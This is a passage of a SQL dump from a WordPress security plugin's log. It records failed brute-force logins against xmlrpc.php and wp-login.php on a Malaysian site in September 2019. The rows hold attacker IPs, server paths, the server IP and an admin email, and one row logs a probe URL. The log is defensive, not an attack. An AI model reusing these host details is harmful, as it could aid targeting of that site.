empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.136.82.207\";s:11:\"REMOTE_PORT\";s:5:\"58192\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXocPvg5Ioxk9WyWK@dXiAAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568283710.5512\";s:12:\"REQUEST_TIME\";s:10:\"1568283710\";}}','notice','2019-09-12 10:21:52','2019-09-12 10:21:50',18214888,19511976,'https://bintara.com.my/xmlrpc.php',1,0,'213.136.82.207'),(23745,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.136.82.207\";s:11:\"REMOTE_PORT\";s:5:\"57858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXocO-g5Ioxk9WyWK@dXhQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568283707.4339\";s:12:\"REQUEST_TIME\";s:10:\"1568283707\";}}','notice','2019-09-12 10:21:48','2019-09-12 10:21:47',17701144,19193408,'https://bintara.com.my/wp-login.php',1,0,'213.136.82.207'),(23744,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"36506\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXnYFoHHXVqvdFQL0zaxUwAAABI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568266263.3441\";s:12:\"REQUEST_TIME\";s:10:\"1568266263\";}}','notice','2019-09-12 05:31:05','2019-09-12 05:31:03',18215256,19512488,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(23743,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"36106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXnYEoHHXVqvdFQL0zaxTgAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568266258.8313\";s:12:\"REQUEST_TIME\";s:10:\"1568266258\";}}','notice','2019-09-12 05:31:00','2019-09-12 05:30:59',17703200,19194496,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23742,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"58846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXmUhOO18DD4DnnPTCONpgAAAZY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568248964.3533\";s:12:\"REQUEST_TIME\";s:10:\"1568248964\";}}','notice','2019-09-12 00:42:45','2019-09-12 00:42:44',18219832,19518152,'https://bintara.com.my/xmlrpc.php',1,0,'103.74.121.142'),(23740,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-11 20:55:43','2019-09-11 20:55:40',17752112,18214544,'http://bintara.com.my/2019/index.php?3x=3x',1,0,'37.187.132.5'),(23741,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"58568\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXmUgYHHXVqvdFQL0zahGAAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568248961.2265\";s:12:\"REQUEST_TIME\";s:10:\"1568248961\";}}','notice','2019-09-12 00:42:42','2019-09-12 00:42:41',17704264,19193272,'https://bintara.com.my/wp-login.php',1,0,'103.74.121.142'),(23739,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"20254\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXkUxRH9II9QhlsjKh23aAAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568216261.242\";s:12:\"REQUEST_TIME\";s:10:\"1568216261\";}}','notice','2019-09-11 15:37:42','2019-09-11 15:37:41',18217672,19517288,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(23738,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"19648\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXkUwRH9II9QhlsjKh23ZwAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568216257.9202\";s:12:\"REQUEST_TIME\";s:10:\"1568216257\";}}','notice','2019-09-11 15:37:39','2019-09-11 15:37:38',17704456,19195016,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(23753,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"49264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXtOhI0E8jDQt@1qD1430gAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568362116.6209\";s:12:\"REQUEST_TIME\";s:10:\"1568362116\";}}','notice','2019-09-13 08:08:38','2019-09-13 08:08:37',18299120,19598208,'https://bintara.com.my/xmlrpc.php',1,0,'51.38.128.211'),(23752,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 